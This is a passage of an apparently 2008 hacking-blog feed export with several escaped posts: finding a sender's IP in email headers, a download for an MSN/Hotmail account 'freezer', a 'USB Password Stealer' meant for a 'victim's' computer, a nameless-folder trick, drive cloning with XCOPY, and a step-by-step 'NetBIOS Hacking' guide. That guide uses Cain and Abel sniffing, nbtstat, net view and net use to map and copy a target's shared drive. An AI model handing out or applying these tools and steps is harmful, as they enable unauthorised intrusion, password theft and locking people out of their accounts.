mail&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;5. You should see similar headers like above&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Or if you want to manually find the IP address, proceed to 6.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;6. Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;That is be the IP address of the sender.&lt;/span&gt;&lt;/p&gt; &lt;div style=&quot;text-align: justify; font-weight: bold;&quot;&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.&lt;/span&gt;&lt;/div&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;br /&gt;7. Track the IP address of the sender&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-size: 130%;&quot;&gt;&lt;b&gt;Finding IP address in Hotmail&lt;/b&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;1. Log into your Hotmail account with your username and password.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;2. Click on the Mail tab on the top.&lt;/p&gt; &lt;p&gt;3. Open the mail.&lt;/p&gt; &lt;p&gt;4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt; Click on Options on the top-right corner&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt; In the Mail Options page, click on Mail Display Settings&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt; In Message Headers, make sure Advanced option is checked&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt; Click on Ok button&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt; Go back to the mails and open that mail&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;5. You should see the email headers now.&lt;/span&gt;&lt;/p&gt; &lt;p&gt;6. manually find the IP address, proceed to 7.&lt;/p&gt; &lt;p&gt;7. If you find a header with X-Originating-IP: followed by an IP address, that is the sender’s IP address&lt;b&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;br /&gt;Hotmail headers &lt;/span&gt;&lt;br /&gt;&lt;/b&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;br /&gt;In this case the IP address of the sender is [68.34.60.59].&lt;/span&gt;&lt;/p&gt; &lt;p&gt;8. If you find a header with Received: from followed by a Gmail proxy like this&lt;/p&gt; &lt;p&gt;&lt;span style=&quot;color: rgb(255, 0, 0); font-size: 130%;&quot;&gt;&lt;b&gt;Hotmail headers&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;br /&gt;Look for Received: from followed by IP address within square brackets[&lt;br /&gt;In this case, the IP address of the sender is [69.140.7.58].&lt;/span&gt;&lt;/p&gt; &lt;p&gt;9. Or else if you have headers like this&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt; Hotmail headers&lt;/span&gt;&lt;br /&gt;&lt;/b&gt;&lt;span style=&quot;font-family: verdana;&quot;&gt;&lt;br /&gt;Look for Received: from followed by IP address within square brackets[].&lt;br /&gt;In this case, the IP address of the sender is [61.83.145.129] (Spam mail).&lt;/span&gt;&lt;/p&gt; &lt;p&gt;10.  If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.&lt;/p&gt; &lt;p&gt;11. Track the IP address of the sender&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  47. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  48. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  49. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  50. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/3639235339539995360/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=3639235339539995360' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/3639235339539995360'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/3639235339539995360'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/find-ip-info-using-gmailyahoohotmail.html' title='Find IP info using Gmail/Yahoo/Hotmail'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-1850033286415530769</id><published>2008-11-29T00:13:00.001-08:00</published><updated>2008-11-29T00:13:43.518-08:00</updated><title type='text'>Ice Cold Reloaded</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol.&lt;/p&gt; &lt;p&gt;Download Link&lt;br /&gt;&lt;/p&gt;&lt;p&gt; http://download.download-free-software.net/IceCold_ReLoaded&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  51. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  52. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  53. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  54. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/1850033286415530769/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=1850033286415530769' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1850033286415530769'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1850033286415530769'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/ice-cold-reloaded_29.html' title='Ice Cold Reloaded'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-3152996932300817674</id><published>2008-11-29T00:11:00.000-08:00</published><updated>2008-11-29T00:13:08.845-08:00</updated><title type='text'>Create Folders And Files With NO! Name</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;This trick will allow you to create files and folders without any name.&lt;/p&gt; &lt;p&gt;Just follow the following steps:&lt;br /&gt;1.Select any file or folder.&lt;br /&gt;2.Right click on it, press rename or simply press F2.&lt;br /&gt;3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.&lt;/p&gt; &lt;p&gt;Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.&lt;/p&gt; &lt;p&gt;4.Press Enter and the nameless file or folder will be created.&lt;/p&gt; &lt;p&gt;Reason: The file or folder that seems nameless is actually named with a single space.&lt;/p&gt; &lt;p&gt;But what if you want to create another nameless file or folder in the same directory ?&lt;/p&gt; &lt;p&gt;For this you will have to rename the file with 2 spaces. Just follow these steps below:&lt;/p&gt; &lt;p&gt;1.Select file, press F2.&lt;br /&gt;2.Hold alt key and type 0160 from the numpad.&lt;br /&gt;3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.&lt;br /&gt;4.Press enter and you will have second nameless file in the same directory.&lt;br /&gt;5.Repeat step 3 to create as many nameless files or folders in the same directory.&lt;/p&gt; &lt;p&gt;(we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  55. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  56. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  57. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  58. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/3152996932300817674/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=3152996932300817674' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/3152996932300817674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/3152996932300817674'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/create-folders-and-files-with-no-name.html' title='Create Folders And Files With NO! Name'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-7981227596874563452</id><published>2008-11-29T00:10:00.000-08:00</published><updated>2008-11-29T00:11:15.086-08:00</updated><title type='text'>USB Password Stealer</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Tweaked USB that steals every passwords including licences.&lt;/p&gt; &lt;p&gt;Instructions&lt;br /&gt;1.Decompress the archive and put all the files located in the folder “USBThief”into a USB.&lt;br /&gt;2.Insert the USB in your victim’s computer.&lt;br /&gt;3.View folder “dump” to see the passwords.&lt;/p&gt; &lt;p&gt;&lt;a id=&quot;alive_link&quot; class=&quot;external&quot; rel=&quot;nofollow&quot; href=&quot;http://rapidshare.com/files/87085733/USBThief.rar&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Download&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Password: www.dl4all.com&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  59. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  60. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  61. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  62. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/7981227596874563452/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=7981227596874563452' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/7981227596874563452'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/7981227596874563452'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/usb-password-stealer_29.html' title='USB Password Stealer'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-6200680022860773080</id><published>2008-11-29T00:09:00.000-08:00</published><updated>2008-11-29T00:10:40.696-08:00</updated><title type='text'>Cloning Hard Drives</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem.&lt;/p&gt; &lt;p&gt;Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.&lt;/p&gt; &lt;p&gt;First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.&lt;/p&gt; &lt;p&gt;Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.&lt;/p&gt; &lt;p&gt;Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the “Full” button.&lt;/p&gt; &lt;p&gt;Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says “Autofix Errors”.&lt;/p&gt; &lt;p&gt;Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:&lt;/p&gt; &lt;p&gt;Click on the “Start” button, then click on the “Run…” button, then place the following into the Runbox:&lt;/p&gt; &lt;p&gt;“XCOPY C:\*.*D:\ /c/h/e/k/r” (minus the quotes, of course) then press the “Enter” button.&lt;/p&gt; &lt;p&gt;If you receive an error message, then remove the space from between XCOPY and C:\&lt;/p&gt; &lt;p&gt;Anything that should happen to come up in the DOS box, just click “Y” for “Yes”. When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.&lt;/p&gt; &lt;p&gt;This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn’t have any problems. If, by any chance, you should come across a snag, message me and I’ll walk you through it.&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  63. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  64. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  65. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  66. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/6200680022860773080/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=6200680022860773080' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/6200680022860773080'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/6200680022860773080'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/cloning-hard-drives_29.html' title='Cloning Hard Drives'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-1582822386162701170</id><published>2008-11-29T00:05:00.000-08:00</published><updated>2008-11-29T00:09:28.256-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="NetBios Hacking"/><title type='text'>NetBios Hacking</title><content type='html'>&lt;p&gt;For this tutorial, I used Microsoft’s Windows XP Home Edition OS&lt;/p&gt; &lt;p&gt;What is it?&lt;/p&gt; &lt;p&gt;NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.&lt;/p&gt; &lt;p&gt;How can this be of useful to me?&lt;/p&gt; &lt;p&gt;Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.&lt;/p&gt; &lt;p&gt;What do I need?&lt;/p&gt; &lt;p&gt;Windows OS&lt;br /&gt;Cain and Abel&lt;/p&gt; &lt;div class=&quot;codetop&quot;&gt;CODE&lt;/div&gt; &lt;div class=&quot;codemain&quot;&gt;(&lt;a class=&quot;external&quot; rel=&quot;nofollow&quot; href=&quot;http://www.oxid.it/downloads/ca_setup.exe&quot; target=&quot;_blank&quot;&gt;http://www.oxid.it/downloads/ca_setup.exe&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;————–&lt;/p&gt; &lt;p&gt;So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios4copy.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios4copy.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;It should begin to scan.&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios3.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok. During the next step we will begin our trial and error.&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios1copy.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;Part 2, Trial and Error&lt;br /&gt;————————————————————————————————&lt;/p&gt; &lt;p&gt;Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios6.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;IF it didn’t work, meaning that the target is not online, it will look something like this:&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios7.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.&lt;/p&gt; &lt;p&gt;Part 3, Gathering the Information.&lt;br /&gt;————————————————————————————————–&lt;/p&gt; &lt;p&gt;Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios7.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.&lt;/p&gt; &lt;p&gt;The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.&lt;/p&gt; &lt;p&gt;The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.&lt;/p&gt; &lt;p&gt;The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a &lt;20&gt;. This means that file sharing is enabled on BATGIRL. If there was not a &lt;20&gt; to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the &lt; &gt; for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup&lt;/p&gt; &lt;p&gt;Step 4, Breaking In&lt;br /&gt;———————————————————————————————–&lt;/p&gt; &lt;p&gt;Finally it’s time. By now we know: that our target is online, our target has file sharing, and our target’s computer name. So it’s time to break in. We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”&lt;br /&gt;An example for this tutorial would be: “net view \\192.168.1.103”&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios11.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.&lt;/p&gt; &lt;p&gt;All’s that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\192.168.1.103\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G…,” for a different target.&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios11.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;As you can see, for my hack I have already used “K,” so I used “G” instead. You may also do the same for multiple hacks. If it worked, it will say “The command completed successfully.” If not, you will have to go retrace you steps. Now open up “my computer” under the start menu, and your newly created network drive should be there.&lt;/p&gt; &lt;p&gt;&lt;img class=&quot;linked-image&quot; src=&quot;http://i98.photobucket.com/albums/l246/h2-h4cks/netbios13.jpg&quot; alt=&quot;&quot; /&gt;&gt; Hacker&#39;s Heaven&quot;&gt;&lt;/p&gt; &lt;p&gt;Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive. The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network. So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting. If you are just doing this to hack something, then go explore it and have some well deserved fun!&lt;/p&gt; &lt;p&gt;Congratulations! You’re DONE!&lt;br /&gt;But, before you leave, please look over some of this information for further help and just for thanks to me.&lt;/p&gt; &lt;p&gt;-Commands used in this tutorial:&lt;/p&gt; &lt;p&gt;PING&lt;br /&gt;NBTSTAT -a (IP Address of Target)&lt;br /&gt;NET VIEW \\(IP Address of Target)&lt;br /&gt;NET USE K: \\(IP Address of Target)\(SHARENAME)&lt;/p&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  67. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  68. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  69. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
